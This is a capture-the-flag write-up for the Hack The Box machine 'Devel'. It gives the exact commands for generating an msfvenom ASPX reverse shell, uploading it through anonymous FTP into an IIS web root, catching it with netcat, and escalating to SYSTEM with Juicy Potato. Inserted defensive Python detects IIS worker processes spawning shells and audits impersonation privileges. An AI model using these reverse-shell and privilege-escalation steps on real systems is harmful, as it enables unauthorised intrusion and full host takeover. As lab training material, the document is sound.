Devel: HTB Writeup

cyber shinobii
Dec 21, 2021 (4 min read)


The first thing I did was launch a series of nmap scans against this machine.

Recon

nmap -Pn -n -sV -A -T4 --open 10.10.10.5

Enumeration

In the nmap version scan above we see that ports 21 and 80 are open. FTP is running on 21 and anonymous login appears to be enabled; the scan also lists a few files that may be in that FTP directory. Before testing the anonymous login on that service, I took a look at the web service on port 80.

10.10.10.5

The nmap version scan did show an IIS server running on port 80, and this web page confirms it. I could not find anything suspicious in the source code. The interesting find is that we can browse to some of the files we saw listed under the anonymous FTP directory in the nmap scan, which means the FTP root and the IIS web root are the same directory.

10.10.10.5/welcome.png

Exploitation

At this point, I am hoping I can upload a shell into that FTP directory and execute it by visiting its URL, which is exactly what I did. First, we create the reverse shell using msfvenom.

msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.13 lport=1234 -f aspx -o this.aspx

Then we log into the FTP server with the anonymous user account, put the FTP session in binary mode, and upload the reverse shell (this.aspx). ASPX is a file type IIS servers can host.

ftp 10.10.10.5

After that is complete, open a netcat listener on your listening port (mine is 1234) and then browse to the URL.

nc -lvnp 1234
10.10.10.5/this.aspx
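From the defender's side, the upload-and-browse step above leaves a very specific footprint on the host: the IIS worker process (w3wp.exe) becomes the parent of a command interpreter, which it almost never is during normal operation. The following detector is an added example and is not part of the original writeup. It assumes process-creation records with Sysmon Event ID 1 style field names (ParentImage, Image, CommandLine, User); the sample records are constructed for this example.

```python
# Added example (not from the original writeup): flag process-creation events in
# which an IIS worker process spawns a command interpreter, the host-side trace of
# an uploaded .aspx reverse shell being executed by the web server.
import ntpath
from typing import Dict, Iterable, List

WEB_WORKERS = {"w3wp.exe"}  # IIS application pool worker process
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe"}

# Constructed sample records in the shape of Sysmon Event ID 1 fields.
# Hostnames, users and paths are made up for this example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # Normal: the worker process itself being started by the service host
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": r'c:\windows\system32\inetsrv\w3wp.exe -ap "Web"',
     "User": r"IIS APPPOOL\Web"},
    # Suspicious: what a served .aspx reverse shell looks like on the host
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"cmd.exe"',
     "User": r"IIS APPPOOL\Web"},
    # Normal: an administrator opening PowerShell from the desktop, unrelated to IIS
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe",
     "User": r"HOST\admin"},
    # Suspicious: the worker process launching PowerShell
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -c whoami",
     "User": r"IIS APPPOOL\Web"},
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def web_worker_spawned_shell(event: Dict[str, str]) -> bool:
    """True when an IIS worker process is the direct parent of a command interpreter."""
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    return parent in WEB_WORKERS and child in INTERPRETERS


def find_suspicious(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the process-creation events that match the web-shell heuristic."""
    return [e for e in events if web_worker_spawned_shell(e)]


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(f"[!] {hit['User']}: {hit['ParentImage']} -> {hit['CommandLine']}")
```

The heuristic keys on parent/child image names rather than command-line contents, so it is not defeated by renaming the uploaded file; the preventive fix on the server side is simply not to let an anonymous FTP account write into the web root.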

Privilege Escalation

We get a shell back as a service account. If you check your permissions, you will see some special privileges enabled.

whoami /priv

SeImpersonatePrivilege and SeCreateGlobalPrivilege give us an opportunity to impersonate a token, hopefully the SYSTEM token, to create a process. There are a few tools that can do this for us. I used juicy potato, which you can find here.
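Reading `whoami /priv` by eye is fine on one box; when auditing which service accounts on a fleet hold impersonation privileges it helps to parse it. The script below is an added example, not part of the original writeup. It parses the text layout `whoami /priv` prints and reports the privileges that token-impersonation tooling relies on (SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege); SeCreateGlobalPrivilege, which the writeup also lists, is parsed and reported but not treated as an impersonation privilege. The sample output is constructed to resemble a typical IIS application pool identity.

```python
# Added example (not from the original writeup): parse `whoami /priv` output and
# report which impersonation-related privileges the token holds and has enabled.
from typing import Dict, List

# Privileges that token-impersonation tooling relies on.
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Constructed sample in the column layout `whoami /priv` prints; the privilege
# set is modelled on an IIS application pool identity and is not captured output.
SAMPLE_OUTPUT = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Map privilege name -> state ("Enabled"/"Disabled") from `whoami /priv` text.

    Privilege rows start with a token beginning "Se" and end with the State column;
    the banner, header and separator lines are skipped.
    """
    privs: Dict[str, str] = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs


def held_impersonation_privs(privs: Dict[str, str]) -> List[str]:
    """Impersonation privileges present in the token at all.

    A privilege shown as Disabled is still held: the holder can enable it
    on its own token, so an audit should count both states.
    """
    return sorted(p for p in privs if p in IMPERSONATION_PRIVS)


def enabled_impersonation_privs(privs: Dict[str, str]) -> List[str]:
    """Impersonation privileges currently enabled in the token."""
    return sorted(p for p, state in privs.items()
                  if p in IMPERSONATION_PRIVS and state == "Enabled")


if __name__ == "__main__":
    parsed = parse_whoami_priv(SAMPLE_OUTPUT)
    print("held:   ", held_impersonation_privs(parsed))
    print("enabled:", enabled_impersonation_privs(parsed))
```

In practice you would feed it the saved output of `whoami /priv` run under each service account you care about; any account that does not need to impersonate clients should have these privileges removed from its token.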

The exploit is pretty simple to use. (1) Clone down the git repo. (2) Transfer a reverse shell and the juicy potato executable to the victim box; I uploaded them using FTP. I created the reverse shell using msfvenom and stored it as an executable.

(3) Finally, run the following command: juicy86.exe -l 443 -p shell.exe -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}. Do not forget to change juicy86.exe to the name you saved the juicy potato executable as, and shell.exe to the name of the reverse shell you created using msfvenom.

juicy86.exe -l 443 -p shell.exe -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}

We used the bottom pane to execute the juicy potato executable. The top right pane shows a shell with SYSTEM-level access. The top left pane was used to transfer the juicy potato executable and our payload using the FTP account.

Conclusion

This box was straightforward and fun. We could have kicked off some web directory scans; if we had run into a rabbit hole, gobuster would more than likely have been my next move. I think the most difficult part would have been finding a compatible executable to run against this x86 box. I will share a video walkthrough here very soon. Thanks for reading.
